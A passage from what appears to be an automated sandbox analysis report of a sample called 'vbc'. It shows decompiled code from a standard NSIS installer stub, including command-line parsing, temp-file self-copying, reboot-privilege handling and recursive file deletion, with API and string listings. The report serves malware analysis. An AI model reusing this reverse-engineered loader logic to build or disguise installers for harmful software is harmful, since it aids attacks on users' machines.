                    				_t232 = "UXTHEME";
                    				do {
                    					E00406877(_t232); // executed
                    					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
                    				} while ( *_t232 != 0);
                    				E004068E7(0xb);
                    				 *0x7a8a64 = E004068E7(9);
                    				_t88 = E004068E7(7);
                    				if(_t88 != _t189) {
                    					_t88 =  *_t88(0x1e);
                    					if(_t88 != 0) {
                    						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
                    					}
                    				}
                    				__imp__#17();
                    				__imp__OleInitialize(_t189); // executed
                    				 *0x7a8b20 = _t88;
                    				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
                    				E0040651A(0x7a7a60, L"NSIS Error");
                    				E0040651A(0x7b3000, GetCommandLineW());
                    				_t94 = 0x7b3000;
                    				_t234 = 0x22;
                    				 *0x7a8a60 = 0x400000;
                    				if( *0x7b3000 == _t234) {
                    					_t94 = 0x7b3002;
                    				}
                    				_t199 = CharNextW(E00405E16(_t94, 0x7b3000));
                    				_v16 = _t199;
                    				while(1) {
                    					_t97 =  *_t199;
                    					_t252 = _t97 - _t189;
                    					if(_t97 == _t189) {
                    						break;
                    					}
                    					_t210 = 0x20;
                    					__eflags = _t97 - _t210;
                    					if(_t97 != _t210) {
                    						L17:
                    						__eflags =  *_t199 - _t234;
                    						_v12 = _t210;
                    						if( *_t199 == _t234) {
                    							_v12 = _t234;
                    							_t199 = _t199 + 2;
                    							__eflags = _t199;
                    						}
                    						__eflags =  *_t199 - 0x2f;
                    						if( *_t199 != 0x2f) {
                    							L32:
                    							_t199 = E00405E16(_t199, _v12);
                    							__eflags =  *_t199 - _t234;
                    							if(__eflags == 0) {
                    								_t199 = _t199 + 2;
                    								__eflags = _t199;
                    							}
                    							continue;
                    						} else {
                    							_t199 = _t199 + 2;
                    							__eflags =  *_t199 - 0x53;
                    							if( *_t199 != 0x53) {
                    								L24:
                    								asm("cdq");
                    								asm("cdq");
                    								_t215 = L"NCRC" & 0x0000ffff;
                    								asm("cdq");
                    								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
                    								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
                    								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
                    									L29:
                    									asm("cdq");
                    									asm("cdq");
                    									_t210 = L" /D=" & 0x0000ffff;
                    									asm("cdq");
                    									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
                    									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
                    									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
                    										L31:
                    										_t234 = 0x22;
                    										goto L32;
                    									}
                    									__eflags =  *_t199 - _t230;
                    									if( *_t199 == _t230) {
                    										 *(_t199 - 4) = _t189;
                    										__eflags = _t199;
                    										E0040651A(0x7b3800, _t199);
                    										L37:
                    										_t235 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                    										GetTempPathW(0x400, _t235);
                    										_t116 = E004034D9(_t199, _t252);
                    										_t253 = _t116;
                    										if(_t116 != 0) {
                    											L40:
                    											DeleteFileW(L"1033"); // executed
                    											_t118 = E0040307D(_t255, _v20); // executed
                    											_v8 = _t118;
                    											if(_t118 != _t189) {
                    												L68:
                    												E00403AEF();
                    												__imp__OleUninitialize();
                    												if(_v8 == _t189) {
                    													if( *0x7a8af4 == _t189) {
                    														L77:
                    														_t120 =  *0x7a8b0c;
                    														if(_t120 != 0xffffffff) {
                    															_v24 = _t120;
                    														}
                    														ExitProcess(_v24);
                    													}
                    													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                    														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
                    														_v40.PrivilegeCount = 1;
                    														_v28 = 2;
                    														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
                    													}
                    													_t124 = E004068E7(4);
                    													if(_t124 == _t189) {
                    														L75:
                    														if(ExitWindowsEx(2, 0x80040002) != 0) {
                    															goto L77;
                    														}
                    														goto L76;
                    													} else {
                    														_push(0x80040002);
                    														_push(0x25);
                    														_push(_t189);
                    														_push(_t189);
                    														_push(_t189);
                    														if( *_t124() == 0) {
                    															L76:
                    															E0040140B(9);
                    															goto L77;
                    														}
                    														goto L75;
                    													}
                    												}
                    												E00405B7A(_v8, 0x200010);
                    												ExitProcess(2);
                    											}
                    											if( *0x7a8a7c == _t189) {
                    												L51:
                    												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
                    												_v24 = E00403BC9(_t265);
                    												goto L68;
                    											}
                    											_t219 = E00405E16(0x7b3000, _t189);
                    											if(_t219 < 0x7b3000) {
                    												L48:
                    												_t264 = _t219 - 0x7b3000;
                    												_v8 = L"Error launching installer";
                    												if(_t219 < 0x7b3000) {
                    													_t190 = E00405AE5(__eflags);
                    													lstrcatW(_t235, L"~nsu");
                    													__eflags = _t190;
                    													if(_t190 != 0) {
                    														lstrcatW(_t235, "A");
                    													}
                    													lstrcatW(_t235, L".tmp");
                    													_t138 = lstrcmpiW(_t235, 0x7b4800);
                    													__eflags = _t138;
                    													if(_t138 == 0) {
                    														L67:
                    														_t189 = 0;
                    														__eflags = 0;
                    														goto L68;
                    													} else {
                    														__eflags = _t190;
                    														_push(_t235);
                    														if(_t190 == 0) {
                    															E00405AC8();
                    														} else {
                    															E00405A4B();
                    														}
                    														SetCurrentDirectoryW(_t235);
                    														__eflags =  *0x7b3800;
                    														if( *0x7b3800 == 0) {
                    															E0040651A(0x7b3800, 0x7b4800);
                    														}
                    														E0040651A(0x7a9000, _v16);
                    														_t202 = "A" & 0x0000ffff;
                    														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                    														__eflags = _t144;
                    														_v12 = 0x1a;
                    														 *0x7a9800 = _t144;
                    														do {
                    															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
                    															DeleteFileW(0x79f708);
                    															__eflags = _v8;
                    															if(_v8 != 0) {
                    																_t149 = CopyFileW(0x7b6800, 0x79f708, 1);
                    																__eflags = _t149;
                    																if(_t149 != 0) {
                    																	E004062DA(_t202, 0x79f708, 0);
                    																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
                    																	_t153 = E00405AFD(0x79f708);
                    																	__eflags = _t153;
                    																	if(_t153 != 0) {
                    																		CloseHandle(_t153);
                    																		_v8 = 0;
                    																	}
                    																}
                    															}
                    															 *0x7a9800 =  *0x7a9800 + 1;
                    															_t61 =  &_v12;
                    															 *_t61 = _v12 - 1;
                    															__eflags =  *_t61;
                    														} while ( *_t61 != 0);
                    														E004062DA(_t202, _t235, 0);
                    														goto L67;
                    													}
                    												}
                    												 *_t219 = _t189;
                    												_t222 =  &(_t219[2]);
                    												_t158 = E00405EF1(_t264,  &(_t219[2]));
                    												_t265 = _t158;
                    												if(_t158 == 0) {
                    													goto L68;
                    												}
                    												E0040651A(0x7b3800, _t222);
                    												E0040651A(0x7b4000, _t222);
                    												_v8 = _t189;
                    												goto L51;
                    											}
                    											asm("cdq");
                    											asm("cdq");
                    											asm("cdq");
                    											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                    											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                    											while( *_t219 != _t205 || _t219[1] != _t168) {
                    												_t219 = _t219;
                    												if(_t219 >= 0x7b3000) {
                    													continue;
                    												}
                    												break;
                    											}
                    											_t189 = 0;
                    											goto L48;
                    										}
                    										GetWindowsDirectoryW(_t235, 0x3fb);
                    										lstrcatW(_t235, L"\\Temp");
                    										_t171 = E004034D9(_t199, _t253);
                    										_t254 = _t171;
                    										if(_t171 != 0) {
                    											goto L40;
                    										}
                    										GetTempPathW(0x3fc, _t235);
                    										lstrcatW(_t235, L"Low");
                    										SetEnvironmentVariableW(L"TEMP", _t235);
                    										SetEnvironmentVariableW(L"TMP", _t235);
                    										_t176 = E004034D9(_t199, _t254);
                    										_t255 = _t176;
                    										if(_t176 == 0) {
                    											goto L68;
                    										}
                    										goto L40;
                    									}
                    									goto L31;
                    								}
                    								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
                    								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
                    									goto L29;
                    								}
                    								_t178 =  *((intOrPtr*)(_t199 + 8));
                    								__eflags = _t178 - 0x20;
                    								if(_t178 == 0x20) {
                    									L28:
                    									_t36 =  &_v20;
                    									 *_t36 = _v20 | 0x00000004;
                    									__eflags =  *_t36;
                    									goto L29;
                    								}
                    								__eflags = _t178 - _t189;
                    								if(_t178 != _t189) {
                    									goto L29;
                    								}
                    								goto L28;
                    							}
                    							_t179 =  *((intOrPtr*)(_t199 + 2));
                    							__eflags = _t179 - _t210;
                    							if(_t179 == _t210) {
                    								L23:
                    								 *0x7a8b00 = 1;
                    								goto L24;
                    							}
                    							__eflags = _t179 - _t189;
                    							if(_t179 != _t189) {
                    								goto L24;
                    							}
                    							goto L23;
                    						}
                    					} else {
                    						goto L16;
                    					}
                    					do {
                    						L16:
                    						_t199 = _t199 + 2;
                    						__eflags =  *_t199 - _t210;
                    					} while ( *_t199 == _t210);
                    					goto L17;
                    				}
                    				goto L37;
                    			}

                    APIs
                    • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                    • GetVersionExW.KERNEL32(?), ref: 00403556
                    • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                    • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                    • OleInitialize.OLE32(00000000), ref: 00403647
                    • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                    • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                    • CharNextW.USER32(00000000), ref: 004036B3
                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004037E6
                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                    • lstrcatW.KERNEL32 ref: 00403803
                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403817
                    • lstrcatW.KERNEL32 ref: 0040381F
                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                    • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                    • lstrcatW.KERNEL32 ref: 00403933
                    • lstrcatW.KERNEL32 ref: 00403942
                      • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                    • lstrcatW.KERNEL32 ref: 0040394D
                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403959
                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
                    • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                    • CopyFileW.KERNEL32 ref: 004039EB
                    • CloseHandle.KERNEL32(00000000), ref: 00403A18
                    • OleUninitialize.OLE32 ref: 00403A3B
                    • ExitProcess.KERNEL32 ref: 00403A55
                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                    • ExitProcess.KERNEL32 ref: 00403AE9
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                    • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                    • API String ID: 3859024572-2607992671
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 95%
                    			E004056BB(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                    				struct HWND__* _v8;
                    				long _v12;
                    				struct tagRECT _v28;
                    				void* _v36;
                    				signed int _v40;
                    				int _v44;
                    				int _v48;
                    				signed int _v52;
                    				int _v56;
                    				void* _v60;
                    				void* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				struct HWND__* _t94;
                    				long _t95;
                    				int _t100;
                    				void* _t108;
                    				intOrPtr _t119;
                    				void* _t127;
                    				intOrPtr _t130;
                    				struct HWND__* _t134;
                    				int _t156;
                    				int _t159;
                    				struct HMENU__* _t164;
                    				struct HWND__* _t168;
                    				struct HWND__* _t169;
                    				int _t171;
                    				void* _t172;
                    				short* _t173;
                    				short* _t175;
                    				int _t177;
                    
                    				_t169 =  *0x7a7a44;
                    				_t156 = 0;
                    				_v8 = _t169;
                    				if(_a8 != 0x110) {
                    					if(_a8 == 0x405) {
                    						_t127 = CreateThread(0, 0, E0040564F, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                    						CloseHandle(_t127); // executed
                    					}
                    					if(_a8 != 0x111) {
                    						L17:
                    						_t171 = 1;
                    						if(_a8 != 0x404) {
                    							L25:
                    							if(_a8 != 0x7b) {
                    								goto L20;
                    							}
                    							_t94 = _v8;
                    							if(_a12 != _t94) {
                    								goto L20;
                    							}
                    							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                    							_a8 = _t95;
                    							if(_t95 <= _t156) {
                    								L36:
                    								return 0;
                    							}
                    							_t164 = CreatePopupMenu();
                    							AppendMenuW(_t164, _t156, _t171, E00406557(_t156, _t164, _t171, _t156, 0xffffffe1));
                    							_t100 = _a16;
                    							_t159 = _a16 >> 0x10;
                    							if(_a16 == 0xffffffff) {
                    								GetWindowRect(_v8,  &_v28);
                    								_t100 = _v28.left;
                    								_t159 = _v28.top;
                    							}
                    							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                    								_v60 = _t156;
                    								_v48 = 0x7a1f48;
                    								_v44 = 0x1000;
                    								_a4 = _a8;
                    								do {
                    									_a4 = _a4 - 1;
                    									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                    								} while (_a4 != _t156);
                    								OpenClipboard(_t156);
                    								EmptyClipboard();
                    								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                    								_a4 = _t108;
                    								_t172 = GlobalLock(_t108);
                    								do {
                    									_v48 = _t172;
                    									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                    									 *_t173 = 0xd;
                    									_t175 = _t173 + 2;
                    									 *_t175 = 0xa;
                    									_t172 = _t175 + 2;
                    									_t156 = _t156 + 1;
                    								} while (_t156 < _a8);
                    								GlobalUnlock(_a4);
                    								SetClipboardData(0xd, _a4);
                    								CloseClipboard();
                    							}
                    							goto L36;
                    						}
                    						if( *0x7a7a2c == _t156) {
                    							ShowWindow( *0x7a8a68, 8);
                    							if( *0x7a8aec == _t156) {
                    								_t119 =  *0x7a0f20; // 0x9f0f84
                    								E0040557C( *((intOrPtr*)(_t119 + 0x34)), _t156);
                    							}
                    							E0040444F(_t171);
                    							goto L25;
                    						}
                    						 *0x7a0718 = 2;
                    						E0040444F(0x78);
                    						goto L20;
                    					} else {
                    						if(_a12 != 0x403) {
                    							L20:
                    							return E004044DD(_a8, _a12, _a16);
                    						}
                    						ShowWindow( *0x7a7a30, _t156);
                    						ShowWindow(_t169, 8);
                    						E004044AB(_t169);
                    						goto L17;
                    					}
                    				}
                    				_v52 = _v52 | 0xffffffff;
                    				_v40 = _v40 | 0xffffffff;
                    				_t177 = 2;
                    				_v60 = _t177;
                    				_v56 = 0;
                    				_v48 = 0;
                    				_v44 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				_t130 =  *0x7a8a70;
                    				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                    				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                    				 *0x7a7a30 = GetDlgItem(_a4, 0x403);
                    				 *0x7a7a28 = GetDlgItem(_a4, 0x3ee);
                    				_t134 = GetDlgItem(_a4, 0x3f8);
                    				 *0x7a7a44 = _t134;
                    				_v8 = _t134;
                    				E004044AB( *0x7a7a30);
                    				 *0x7a7a34 = E00404E04(4);
                    				 *0x7a7a4c = 0;
                    				GetClientRect(_v8,  &_v28);
                    				_v52 = _v28.right - GetSystemMetrics(_t177);
                    				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                    				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                    				if(_a8 >= 0) {
                    					SendMessageW(_v8, 0x1001, 0, _a8);
                    					SendMessageW(_v8, 0x1026, 0, _a8);
                    				}
                    				if(_a12 >= _t156) {
                    					SendMessageW(_v8, 0x1024, _t156, _a12);
                    				}
                    				_push( *((intOrPtr*)(_a16 + 0x30)));
                    				_push(0x1b);
                    				E00404476(_a4);
                    				if(( *0x7a8a78 & 0x00000003) != 0) {
                    					ShowWindow( *0x7a7a30, _t156);
                    					if(( *0x7a8a78 & 0x00000002) != 0) {
                    						 *0x7a7a30 = _t156;
                    					} else {
                    						ShowWindow(_v8, 8);
                    					}
                    					E004044AB( *0x7a7a28);
                    				}
                    				_t168 = GetDlgItem(_a4, 0x3ec);
                    				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                    				if(( *0x7a8a78 & 0x00000004) != 0) {
                    					SendMessageW(_t168, 0x409, _t156, _a12);
                    					SendMessageW(_t168, 0x2001, _t156, _a8);
                    				}
                    				goto L36;
                    			}

                    APIs
                    • GetDlgItem.USER32(?,00000403), ref: 00405719
                    • GetDlgItem.USER32(?,000003EE), ref: 00405728
                    • GetClientRect.USER32 ref: 00405765
                    • GetSystemMetrics.USER32 ref: 0040576C
                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040578D
                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040579E
                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057B1
                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057BF
                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057D2
                    • ShowWindow.USER32(00000000,?), ref: 004057F4
                    • ShowWindow.USER32(?,00000008), ref: 00405808
                    • GetDlgItem.USER32(?,000003EC), ref: 00405829
                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405839
                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405852
                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040585E
                    • GetDlgItem.USER32(?,000003F8), ref: 00405737
                      • Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9
                    • GetDlgItem.USER32(?,000003EC), ref: 0040587B
                    • CreateThread.KERNELBASE(00000000,00000000,Function_0000564F,00000000), ref: 00405889
                    • CloseHandle.KERNELBASE(00000000), ref: 00405890
                    • ShowWindow.USER32(00000000), ref: 004058B4
                    • ShowWindow.USER32(?,00000008), ref: 004058B9
                    • ShowWindow.USER32(00000008), ref: 00405903
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405937
                    • CreatePopupMenu.USER32 ref: 00405948
                    • AppendMenuW.USER32 ref: 0040595C
                    • GetWindowRect.USER32(?,?), ref: 0040597C
                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405995
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059CD
                    • OpenClipboard.USER32(00000000), ref: 004059DD
                    • EmptyClipboard.USER32 ref: 004059E3
                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004059EF
                    • GlobalLock.KERNEL32 ref: 004059F9
                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A0D
                    • GlobalUnlock.KERNEL32(00000000), ref: 00405A2D
                    • SetClipboardData.USER32 ref: 00405A38
                    • CloseClipboard.USER32 ref: 00405A3E
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                    • String ID: {
                    • API String ID: 590372296-366298937
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 98%
                    			E00405C26(void* __eflags, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				short _v556;
                    				short _v558;
                    				struct _WIN32_FIND_DATAW _v604;
                    				signed int _t38;
                    				signed int _t52;
                    				signed int _t55;
                    				signed int _t62;
                    				void* _t64;
                    				signed char _t65;
                    				WCHAR* _t66;
                    				void* _t67;
                    				WCHAR* _t68;
                    				void* _t70;
                    
                    				_t65 = _a8;
                    				_t68 = _a4;
                    				_v8 = _t65 & 0x00000004;
                    				_t38 = E00405EF1(__eflags, _t68);
                    				_v12 = _t38;
                    				if((_t65 & 0x00000008) != 0) {
                    					_t62 = DeleteFileW(_t68); // executed
                    					asm("sbb eax, eax");
                    					_t64 =  ~_t62 + 1;
                    					 *0x7a8ae8 =  *0x7a8ae8 + _t64;
                    					return _t64;
                    				}
                    				_a4 = _t65;
                    				_t8 =  &_a4;
                    				 *_t8 = _a4 & 0x00000001;
                    				__eflags =  *_t8;
                    				if( *_t8 == 0) {
                    					L5:
                    					E0040651A(0x7a3f50, _t68);
                    					__eflags = _a4;
                    					if(_a4 == 0) {
                    						E00405E35(_t68);
                    					} else {
                    						lstrcatW(0x7a3f50, L"\\*.*");
                    					}
                    					__eflags =  *_t68;
                    					if( *_t68 != 0) {
                    						L10:
                    						lstrcatW(_t68, 0x40a014);
                    						L11:
                    						_t66 =  &(_t68[lstrlenW(_t68)]);
                    						_t38 = FindFirstFileW(0x7a3f50,  &_v604);
                    						_t70 = _t38;
                    						__eflags = _t70 - 0xffffffff;
                    						if(_t70 == 0xffffffff) {
                    							L26:
                    							__eflags = _a4;
                    							if(_a4 != 0) {
                    								_t30 = _t66 - 2;
                    								 *_t30 =  *(_t66 - 2) & 0x00000000;
                    								__eflags =  *_t30;
                    							}
                    							goto L28;
                    						} else {
                    							goto L12;
                    						}
                    						do {
                    							L12:
                    							__eflags = _v604.cFileName - 0x2e;
                    							if(_v604.cFileName != 0x2e) {
                    								L16:
                    								E0040651A(_t66,  &(_v604.cFileName));
                    								__eflags = _v604.dwFileAttributes & 0x00000010;
                    								if(__eflags == 0) {
                    									_t52 = E00405BDE(__eflags, _t68, _v8);
                    									__eflags = _t52;
                    									if(_t52 != 0) {
                    										E0040557C(0xfffffff2, _t68);
                    									} else {
                    										__eflags = _v8 - _t52;
                    										if(_v8 == _t52) {
                    											 *0x7a8ae8 =  *0x7a8ae8 + 1;
                    										} else {
                    											E0040557C(0xfffffff1, _t68);
                    											E004062DA(_t67, _t68, 0);
                    										}
                    									}
                    								} else {
                    									__eflags = (_a8 & 0x00000003) - 3;
                    									if(__eflags == 0) {
                    										E00405C26(__eflags, _t68, _a8);
                    									}
                    								}
                    								goto L24;
                    							}
                    							__eflags = _v558;
                    							if(_v558 == 0) {
                    								goto L24;
                    							}
                    							__eflags = _v558 - 0x2e;
                    							if(_v558 != 0x2e) {
                    								goto L16;
                    							}
                    							__eflags = _v556;
                    							if(_v556 == 0) {
                    								goto L24;
                    							}
                    							goto L16;
                    							L24:
                    							_t55 = FindNextFileW(_t70,  &_v604);
                    							__eflags = _t55;
                    						} while (_t55 != 0);
                    						_t38 = FindClose(_t70);
                    						goto L26;
                    					}
                    					__eflags =  *0x7a3f50 - 0x5c;
                    					if( *0x7a3f50 != 0x5c) {
                    						goto L11;
                    					}
                    					goto L10;
                    				} else {
                    					__eflags = _t38;
                    					if(_t38 == 0) {
                    						L28:
                    						__eflags = _a4;
                    						if(_a4 == 0) {
                    							L36:
                    							return _t38;
                    						}
                    						__eflags = _v12;
                    						if(_v12 != 0) {
                    							_t38 = E00406850(_t68);
                    							__eflags = _t38;
                    							if(_t38 == 0) {
                    								goto L36;
                    							}
                    							E00405DE9(_t68);
                    							_t38 = E00405BDE(__eflags, _t68, _v8 | 0x00000001);
                    							__eflags = _t38;
                    							if(_t38 != 0) {
                    								return E0040557C(0xffffffe5, _t68);
                    							}
                    							__eflags = _v8;
                    							if(_v8 == 0) {
                    								goto L30;
                    							}
                    							E0040557C(0xfffffff1, _t68);
                    							return E004062DA(_t67, _t68, 0);
                    						}
                    						L30:
                    						 *0x7a8ae8 =  *0x7a8ae8 + 1;
                    						return _t38;
                    					}
                    					__eflags = _t65 & 0x00000002;
                    					if((_t65 & 0x00000002) == 0) {
                    						goto L28;
                    					}
                    					goto L5;
                    				}
                    			}

                    APIs
                    • DeleteFileW.KERNELBASE(?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                    • lstrcatW.KERNEL32 ref: 00405C97
                    • lstrcatW.KERNEL32 ref: 00405CBA
                    • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                    • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D70
                    • FindClose.KERNEL32(00000000), ref: 00405D7F
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
